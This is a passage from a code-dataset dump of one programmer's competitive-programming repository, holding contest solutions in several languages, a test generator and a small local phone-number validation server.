0.26288658380508423, "alphanum_fraction": 0.27577319741249084, "avg_line_length": 26.012659072875977, "blob_id": "57e4b626f0384e617edcb393ca22f79606c46dd1", "content_id": "433734de8d57e704b29bd54a034e0ef01fc5582a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4268, "license_type": "no_license", "max_line_length": 80, "num_lines": 158, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.29/H.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*;\nimport java.util.*;\n\npublic class H {\n\n final static String task_name = \"stdin\";\n\n void run() throws IOException {\n int h = nextInt();\n char[] q = next().toCharArray();\n int m = q.length + 1;\n int[] ans = new int[m];\n int l = 1;\n int d = 0;\n\n for (int i = 1, c = 1; i < m; i++) {\n if (q[i - 1] == '>') {\n if (d == -1) {\n ++c;\n } else {\n c = 2;\n d = -1;\n }\n } else if (q[i - 1] == '<') {\n if (d == 1) {\n ++c;\n } else {\n c = 2;\n d = 1;\n }\n }\n if (c > l) {\n l = c;\n }\n }\n\n if (l > h) {\n pw.println(-1);\n return;\n }\n\n d = 0;\n for (int i = 1; i < m && d == 0; i++) {\n if (q[i - 1] == '>') {\n d = -1;\n } else if (q[i - 1] == '<') {\n d = 1;\n }\n\n }\n\n if (d == 0) {\n Arrays.fill(ans, 1);\n } else {\n ans[0] = (d == 1) ? 
1 : l;\n int x = 1;\n while (x < m) {\n int y, z;\n for (y = x; y < m; y++) {\n if (d == 1 && q[y - 1] == '>') {\n break;\n }\n if (d == -1 && q[y - 1] == '<') {\n break;\n }\n }\n\n --y;\n\n for (z = x; z <= y; z++) {\n if (q[z - 1] != '=') {\n break;\n }\n }\n\n //pw.println(d + \" \" + x + \" \" + z + \" \" + y);\n\n if (d == 1) {\n ans[y] = l;\n for (int i = y - 1; i >= z; i--) {\n if (q[i] != '=') {\n ans[i] = ans[i + 1] - 1;\n } else {\n ans[i] = ans[i + 1];\n }\n }\n for (int i = x; i < z; i++) {\n if (q[i - 1] != '=') {\n ans[i] = ans[i - 1] + 1;\n } else {\n ans[i] = ans[i - 1];\n }\n }\n\n d = -1;\n } else {\n\n ans[y] = 1;\n for (int i = y - 1; i >= z; i--) {\n if (q[i] != '=') {\n ans[i] = ans[i + 1] + 1;\n } else {\n ans[i] = ans[i + 1];\n }\n }\n for (int i = x; i < z; i++) {\n if (q[i - 1] != '=') {\n ans[i] = ans[i - 1] - 1;\n } else {\n ans[i] = ans[i - 1];\n }\n }\n\n d = 1;\n }\n\n x = y + 1;\n }\n\n }\n\n for (int a : ans) {\n pw.print((char) (a + 96));\n }\n\n }\n\n String next() throws IOException {\n while (st == null || !st.hasMoreTokens())\n st = new StringTokenizer(br.readLine());\n return st.nextToken();\n }\n\n int nextInt() throws IOException {\n return Integer.parseInt(next());\n }\n\n String nextLine() throws IOException {\n return br.readLine();\n }\n\n static PrintWriter pw;\n static BufferedReader br;\n static StringTokenizer st;\n\n public static void main(String[] args) throws IOException {\n long timeout = System.currentTimeMillis();\n // br = new BufferedReader(new FileReader(new File(task_name + \".in\")));\n // pw = new PrintWriter(new FileWriter(new File(task_name + \".out\")));\n // while (br.ready())\n br = new BufferedReader(new InputStreamReader(System.in));\n pw = new PrintWriter(System.out);\n new H().run();\n // System.out.println(System.currentTimeMillis() - timeout);\n br.close();\n pw.close();\n }\n}\n" }, { "alpha_fraction": 0.3640483319759369, "alphanum_fraction": 0.40785497426986694, "avg_line_length": 
21.066667556762695, "blob_id": "bec07be1bd4344dd781ad5bdfe4b2774737a1a3d", "content_id": "ca3994b24c423ca67edb301e30f46c8f7c5f7927", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 662, "license_type": "no_license", "max_line_length": 77, "num_lines": 30, "path": "/2017/newYear/I.js", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "var count = Number(readline());\nvar a = {};\nvar minutes = 0;\nvar hours = 12;\n\nfunction good(h, m) {\n var s = \"\" + h + \"\" + (m >= 10 ? m : (\"0\" + m));\n var d = s[0] - s[1];\n for (var j = 1; j < s.length - 1; ++j)\n if (s[j] - s[j + 1] != d)\n return 0;\n// print(s, h, m)\n return 1;\n}\n\nvar i = 0;\nfor (; i === 0 || minutes !== 0 || hours !== 12; ++i) {\n a[i] = i === 0 ? 0 : a[i - 1] + good(hours, minutes);\n \n minutes++;\n if (minutes == 60) {\n minutes = 0;\n hours++;\n }\n if (hours == 13)\n hours = 1;\n}\n\nvar ans = a[i - 1] * (count >= i ? Math.floor(count / i) : 0) + a[count % i];\nprint(ans);\n" }, { "alpha_fraction": 0.5185185074806213, "alphanum_fraction": 0.5185185074806213, "avg_line_length": 22.14285659790039, "blob_id": "fc10f4e46df62ef172b0d3104e6d691aeb8e2132", "content_id": "f4083996274b72de8627a7cb23cd61a597dc0c4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 162, "license_type": "no_license", "max_line_length": 42, "num_lines": 7, "path": "/trash/files.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "f = open('in', 'r')\ng = open('out', 'w')\nw = [int(x) for x in f.readline().split()]\nw.reverse()\nfor x in w:\n g.write(str(x) + ' ')\n#g.write(str(x) for x in w)\n" }, { "alpha_fraction": 0.48574298620224, "alphanum_fraction": 0.5084337592124939, "avg_line_length": 31.54901885986328, "blob_id": "460c1252a7a49af8b573dde762438369cc6eb7fc", "content_id": "286faf7d7673371ef9d928bd149afebccf04ff94", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "C++", "length_bytes": 4980, "license_type": "no_license", "max_line_length": 174, "num_lines": 153, "path": "/CodeForce/1427/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//printTuple\ntemplate<class Tuple, size_t... Is> ostream& print_tuple(ostream& os, const Tuple& t, index_sequence<Is...>) { ((os << (Is == 0 ? \"\" : \" \") << get<Is>(t)), ...); return os; }\ntemplate<class Tuple, size_t... Is> istream& read_tuple(istream& is, Tuple& t, index_sequence<Is...>) { ((is >> get<Is>(t)), ...); return is; }\ntemplate<class... 
Args> inline ostream& operator<<(ostream& os, const tuple<Args...>& t) { return print_tuple(os, t, index_sequence_for<Args...>{}); }\ntemplate<class... Args> inline istream& operator>>(istream& is, tuple<Args...>& t) { return read_tuple(is, t, index_sequence_for<Args...>{}); }\n\n//}}}\ntemplate<typename T = ll>\nT extendedGcd(const T& a, const T& b, T& x, T& y)\n{\n\tif (a == 0)\n {\n\t\tx = 0;\n y = 1;\n\t\treturn b;\n\t}\n\tT x1, y1;\n\tT d = extendedGcd(b % a, a, x1, y1);\n\tx = y1 - (b / a) * x1;\n\ty = x1;\n\treturn d;\n}\n\ntemplate<typename T = ll>\nbool diofant(const T& a, const T& b, const T& c, T& x0, T& y0, T& g)\n{\n\tg = extendedGcd(abs(a), abs(b), x0, y0);\n\tif (c % g != 0)\n\t\treturn false;\n\tx0 *= c / g;\n\ty0 *= c / g;\n\tif (a < 0) x0 *= -1;\n\tif (b < 0) y0 *= -1;\n\treturn true;\n}\n\n\nvoid run()\n{\n mt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n ints(n);\n set<ll> s = {n};\n vector<ll> a = {n};\n vector<tuple<ll, char, ll>> actions;\n fori(90000)\n {\n ll x = a[rng() % a.size()];\n ll y = a[rng() % a.size()];\n int action = rng() % 2;\n ll z = action ? (x + y) : (x ^ y);\n if (s.find(z) != s.end())\n continue;\n else\n {\n s.insert(z);\n a.pb(z);\n actions.emplace_back(x, action ? 
'+' : '^', y);\n }\n }\n\n auto binMul = [&](ll a, ll n)\n {\n a = abs(a);\n n = abs(n);\n ll res = a; --n;\n while (n > 0)\n {\n if (n & 1)\n {\n actions.emplace_back(res, '+', a);\n res += a;\n }\n actions.emplace_back(a, '+', a);\n a += a;\n n >>= 1;\n }\n return res;\n };\n\n ll x0, y0, g;\n fori(a.size())\n FOR(j, i + 1, a.size())\n if (diofant(a[i], a[j], 1ll, x0, y0, g) && g == 1)\n {\n ll temp = abs(a[i] * 1ll * x0);\n ll temp2 = abs(a[j] * 1ll * y0);\n ll e = min(temp, temp2);\n ll r = max(temp, temp2);\n if (e % 2 == 0 && r == e + 1)\n {\n ll q = binMul(a[i], x0);\n ll w = binMul(a[j], y0);\n actions.emplace_back(q, '^', w);\n writeln(actions.size());\n writeln(actions);\n return;\n }\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5208333134651184, "alphanum_fraction": 0.5208333134651184, "avg_line_length": 19.571428298950195, "blob_id": "dbb35ed16afe7473917d224890a047a784b55aa2", "content_id": "8dbb17fe7916f84ca69cb6454f369b1206e4eefe", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 144, "license_type": "no_license", "max_line_length": 56, "num_lines": 7, "path": "/CodeForce/1800/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import re\n\nt = int(input())\nfor i in range(t):\n n = input()\n s = input().lower()\n print('YES' if re.match(r'^m+e+o+w+$', s) else 'NO')\n" }, { "alpha_fraction": 0.4552549421787262, "alphanum_fraction": 0.46930280327796936, "avg_line_length": 29.507936477661133, "blob_id": "cb26708a9882ff67538fe391b67deb3a171d7402", "content_id": "b604f32b89481db527704c4934d35fd4b3a28a0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1922, "license_type": "no_license", "max_line_length": 928, "num_lines": 63, "path": "/CodeForce/0320/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int 
&d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n //freopen(\"input.txt\", \"r\", stdin);\n string s;\n cin >> s;\n s += '1';\n int j = 0;\n if (s[0] == '4')\n {\n printf(\"NO\\n\");\n return 0;\n\n }\n for (int i = 0; i < s.length(); i++)\n if (s[i] != '1' && s[i] != '4')\n {\n printf(\"NO\\n\");\n return 0;\n\n } else\n {\n if (s[i] == '4')\n j++; else{\n if (j > 2)\n {\n\n printf(\"NO\\n\");\n return 0;\n } else j = 0;\n }\n }\n printf(\"YES\");\n return 0;\n}\n" }, { "alpha_fraction": 0.39240506291389465, "alphanum_fraction": 0.4430379867553711, "avg_line_length": 14.600000381469727, "blob_id": "2db28bd8cc2fae7bcef31721ac8e332d82c14a47", "content_id": "494afa8d9a7296711e8bf0fe75f12e2f3d49436d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 79, "license_type": "no_license", "max_line_length": 20, "num_lines": 5, "path": "/2015/snws1/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nc = 0.0\nfor i in range(n):\n c += 1 / (i + 1)\nprint(c * n)\n\n" }, { "alpha_fraction": 0.4653172194957733, "alphanum_fraction": 0.491483598947525, "avg_line_length": 35.4954948425293, "blob_id": "231177ceece0a0e85f46c37b95fb4dbc550b1fbd", "content_id": "7564d0d2af8daa0d13df3aaa4adab6cea6489213", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4051, "license_type": "no_license", "max_line_length": 174, "num_lines": 111, "path": "/CodeForce/gym/360425/G.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n, k);\n vector<array<int, 4>> a(n), b(n);\n fori(n)\n readln(a[i][0], a[i][1], a[i][2]),\n a[i][3] = i,\n b[i][3] = i,\n b[i][1] = a[i][0],\n b[i][0] = a[i][1],\n b[i][2] = a[i][2];\n set<array<int, 4>> s(all(a));\n set<array<int, 4>> t(all(b));\n vector<int> ans(n, -1);\n vector<int> comps;\n fori(n)\n if (ans[i] == -1)\n {\n vector<int> c;\n int mn = MOD;\n function<void(int)> dfs = [&](int u) {\n mn = min(mn, a[u][2]);\n ans[u] = 1;\n s.erase(a[u]);\n t.erase(b[u]);\n auto right = s.lower_bound(a[u]);\n if (right != s.end())\n if ((*right)[0] == a[u][0] && (*right)[1] - a[u][1] <= k)\n dfs((*right)[3]);\n auto left = s.lower_bound({a[u][0], a[u][1] - k, 0, 0});\n if (left != s.end())\n if ((*left)[0] == a[u][0] && (*left)[1] < a[u][1])\n dfs((*left)[3]);\n\n auto up = t.lower_bound(b[u]);\n if (up != t.end())\n if ((*up)[0] == b[u][0] && (*up)[1] - b[u][1] <= k)\n dfs((*up)[3]);\n auto down = t.lower_bound({b[u][0], b[u][1] - k, 0, 0});\n if (down != t.end())\n if ((*down)[0] == b[u][0] && (*down)[1] < b[u][1])\n dfs((*down)[3]);\n };\n dfs(i);\n comps.pb(mn);\n }\n sort(all(comps));\n reverse(all(comps));\n fori(comps.size())\n if (i + 1 == comps.size() || comps[i + 1] <= i)\n return writeln(i);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename 
T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.45783132314682007, "alphanum_fraction": 0.5086058378219604, "avg_line_length": 21.784313201904297, "blob_id": "3f8d70187ea4b02f15227ac71fad3aadeec9f5d9", "content_id": "0f5f75c966b596343d62d6bd3066d1e8d3c5255e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1162, "license_type": "no_license", "max_line_length": 53, "num_lines": 51, "path": "/scripts/A+B/genA+B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <testlib.h>\n#include <writeln.h>\n#include <bits/stdc++.h>\n\nusing namespace std;\n\nint counter = 0;\n\nvoid printTest(string_view first, string_view second)\n{\n startTest(++counter);\n writeln(first, second);\n}\n\nvoid all(string first, string second)\n{\n printTest(first, second);\n printTest(\"-\" + first, second);\n printTest(first, \"-\" + second);\n printTest(\"-\" + first, \"-\" + second);\n}\n\nint main(int argc, char* argv[])\n{\n registerGen(argc, argv, 1);\n string first = \"1\";\n string second = \"1\";\n all(first, second);\n for (int i = 0; i < 30; i += 2)\n second += \"00\",\n all(second, first),\n all(first, second);\n for (int i = 0; i < 10; ++i)\n {\n first = rnd.next(\"[1-9][0-9]{99}\");\n second = rnd.next(\"[1-9][0-9]{99}\");\n all(first, second);\n }\n for (int i = 0; i < 10; ++i)\n {\n first = rnd.next(\"[1-9][0-9]{99}\");\n second = rnd.next(\"[1-9][0-9]{10}\");\n all(first, second);\n }\n for (int i = 0; i < 10; ++i)\n {\n first = rnd.next(\"[1-9][0-9]{1000}\");\n second = rnd.next(\"[1-9][0-9]{1000}\");\n 
printTest(first, second);\n }\n}\n" }, { "alpha_fraction": 0.2841007709503174, "alphanum_fraction": 0.2971329391002655, "avg_line_length": 21.153846740722656, "blob_id": "6d9873d0cc2170dc9f861ae74c7bf7348f78ef3c", "content_id": "7f0fd31faf373ba25f7173d8668400c1699404db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1151, "license_type": "no_license", "max_line_length": 58, "num_lines": 52, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.25/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n \n#define fori(n) for (int i = 0; i < n; ++i)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n \n#define fst first\n#define snd second\n#define pb push_back\n \nusing namespace std;\n \nint main()\n{\n //freopen(\"in.c\", \"r\", stdin);\n int n;\n while (true)\n {\n cin >> n;\n if (n == 0)\n return 0;\n string s;\n int m;\n int count = 0, ans = 0;\n fori(n)\n {\n cin >> s >> m;\n if (s[0] == 'D')\n {\n count += m;\n cout << \"DROP 2 \" << m << \"\\n\";\n }\n else\n {\n int c = min(m, ans);\n if (ans)\n cout << \"TAKE 1 \" << c << \"\\n\";\n m -= c;\n ans -= c;\n if (m)\n {\n cout << \"MOVE 2->1 \" << count << \"\\n\";\n ans += count;\n count = 0;\n cout << \"TAKE 1 \" << m << \"\\n\";\n ans -= m;\n }\n }\n }\n cout << \"\\n\";\n }\n}" }, { "alpha_fraction": 0.3481481373310089, "alphanum_fraction": 0.3870370388031006, "avg_line_length": 30.764705657958984, "blob_id": "93f86b952ba09fceb08ab31dc410a554cfb03885", "content_id": "2074d7c4b2c6e97236945e7c2231ed6ff3298616", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 540, "license_type": "no_license", "max_line_length": 33, "num_lines": 17, "path": "/trash/postfixlogic.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "f = open(\"postfixlogic.out\", \"w\")\nf.write(\"2\\n\")\nf.write(\"S 0 _ -> S _ > 0 
>\\n\")\nf.write(\"S 1 _ -> S _ > 1 >\\n\")\nf.write(\"S o _ -> S o ^ _ <\\n\")\nf.write(\"S a _ -> S a ^ _ <\\n\")\nf.write(\"S o 0 -> S _ > _ ^\\n\")\nf.write(\"S a 1 -> S _ > _ ^\\n\")\nf.write(\"S a 0 -> and a ^ _ <\\n\")\nf.write(\"S o 1 -> or o ^ _ <\\n\")\nf.write(\"or o 0 -> S _ > 1 >\\n\")\nf.write(\"or o 1 -> S _ > 1 >\\n\")\nf.write(\"and a 0 -> S _ > 0 >\\n\")\nf.write(\"and a 1 -> S _ > 0 >\\n\")\nf.write(\"S _ _ -> S _ ^ _ <\\n\")\nf.write(\"S _ 0 -> AC 0 ^ _ ^\\n\")\nf.write(\"S _ 1 -> AC 1 ^ _ ^\\n\")\n" }, { "alpha_fraction": 0.4545454680919647, "alphanum_fraction": 0.5454545617103577, "avg_line_length": 21, "blob_id": "d3c93979440b93650ec71ef41bb5b4e36124212e", "content_id": "929f670d4e602b16051cf5fe5920eaca8aac5a60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22, "license_type": "no_license", "max_line_length": 21, "num_lines": 1, "path": "/2015/tpp/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "print(\"1 1 \"+input())\n" }, { "alpha_fraction": 0.5204473733901978, "alphanum_fraction": 0.548409640789032, "avg_line_length": 27.326732635498047, "blob_id": "a27633479d64f3f06f71be1252c5c4723d7f7b76", "content_id": "ae9aff1fcbd20edc143fa4a3fb333b3419e713a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2861, "license_type": "no_license", "max_line_length": 81, "num_lines": 101, "path": "/examples/server.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import json\nimport logging\nimport re\nimport sys\nimport urllib.parse\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom typing import NamedTuple, List, Tuple\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\nlog.addHandler(logging.FileHandler('solution.log'))\n\n\nclass PhoneParser:\n PHONE_CODES = [982, 986, 912, 934]\n REGEXP = [\n re.compile(r'^\\+7 (\\d{3}) (\\d{3}) (\\d{2})(\\d{2})$'),\n 
re.compile(r'^\\+7 (\\d{3}) (\\d{3}) (\\d{2}) (\\d{2})$'),\n re.compile(r'^\\+7 \\((\\d{3})\\) (\\d{3})-(\\d{2})(\\d{2})$'),\n re.compile(r'^\\+7(\\d{3})(\\d{3})(\\d{2})(\\d{2})$'),\n re.compile(r'^8 (\\d{3}) (\\d{3}) (\\d{2})(\\d{2})$'),\n re.compile(r'^8 (\\d{3}) (\\d{3}) (\\d{2}) (\\d{2})$'),\n re.compile(r'^8 \\((\\d{3})\\) (\\d{3})-(\\d{2})(\\d{2})$'),\n re.compile(r'^8(\\d{3})(\\d{3})(\\d{2})(\\d{2})$'),\n ]\n\n def __init__(self, raw):\n self.raw = raw\n\n def parse(self):\n m = self.match()\n if not m:\n log.info('could not match')\n return ''\n\n code, *parts = m.groups()\n if int(code) not in self.PHONE_CODES:\n log.info('did not match code')\n return ''\n\n return f'+7-{code}-{parts[0]}-{parts[1]}{parts[2]}'\n\n def match(self):\n for pattern in self.REGEXP:\n m = pattern.match(self.raw)\n log.info(f'result matching: raw={self.raw} pattern={pattern}, m={m}')\n if m:\n return m\n\n\nclass Response(NamedTuple):\n code: int\n headers: List[Tuple[str, str]]\n message: str\n\n\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n query = urllib.parse.urlparse(self.path)\n log.info('query: %s', query)\n if query.path == '/ping':\n response = ping()\n elif query.path == '/shutdown':\n sys.exit()\n else:\n response = validate(query)\n\n self.send_response(response.code)\n for name, value in response.headers:\n self.send_header(name, value)\n self.end_headers()\n\n self.wfile.write(response.message.encode())\n\n\ndef ping():\n return Response(200, [], '')\n\n\ndef validate(query: urllib.parse.ParseResult) -> Response:\n if query.path != '/validatePhoneNumber':\n return Response(404, [], '')\n\n phone_number = urllib.parse.parse_qs(query.query).get('phone_number')\n if phone_number is None or len(phone_number) != 1:\n return Response(400, [], '')\n\n log.info('phone_number: %s', phone_number)\n headers = [('Content-Type', 'application/json')]\n\n normalized = PhoneParser(phone_number[0]).parse()\n if normalized:\n result = {'status': True, 'normalized': 
normalized}\n else:\n result = {'status': False}\n\n return Response(200, headers, json.dumps(result))\n\n\nserver = HTTPServer(('127.0.0.1', 7777), Handler)\nserver.serve_forever()\n" }, { "alpha_fraction": 0.46641790866851807, "alphanum_fraction": 0.5, "avg_line_length": 23.363636016845703, "blob_id": "bb17e9b1e92b2a60328e5147793c4db44bab0d0e", "content_id": "ca11ba9dd5a00b38f5092c2320300c64f4938f49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 536, "license_type": "no_license", "max_line_length": 128, "num_lines": 22, "path": "/2015/tpp/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import math\n\na, b = map(float, input().split())\nif b < a:\n t = a\n a = b\n b = t\nf = 'abs(' + input().replace('^', '**').replace('sin', 'math.sin').replace('cos', 'math.cos').replace('sqrt', 'math.sqrt') + ')'\ndef integrant(x):\n return eval(f)\ndef simps(xi, xi1):\n return (xi1 - xi) * (integrant(xi) + 4 * integrant((xi + xi1) / 2) + integrant(xi1)) / 6\n\nanswer = 0\nn = 4229\nd = max((b - a) / n, 0.001)\nx = a\nif a != b:\n while x < b:\n answer += simps(x, x + d)\n x = min(b, x + d)\nprint('%.20f' % (answer))\n" }, { "alpha_fraction": 0.39635801315307617, "alphanum_fraction": 0.4064316153526306, "avg_line_length": 31.262500762939453, "blob_id": "ee5f3d7d3ab799ef31273b1612bd128be6b8ed5c", "content_id": "526e9f68ade0eb463a2e10aa92514339ac41af75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2581, "license_type": "no_license", "max_line_length": 928, "num_lines": 80, "path": "/2013/2013RCC3/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a;\nint n, m;\nvoid writeln(int a){printf(\"%d\\n\", a);}void 
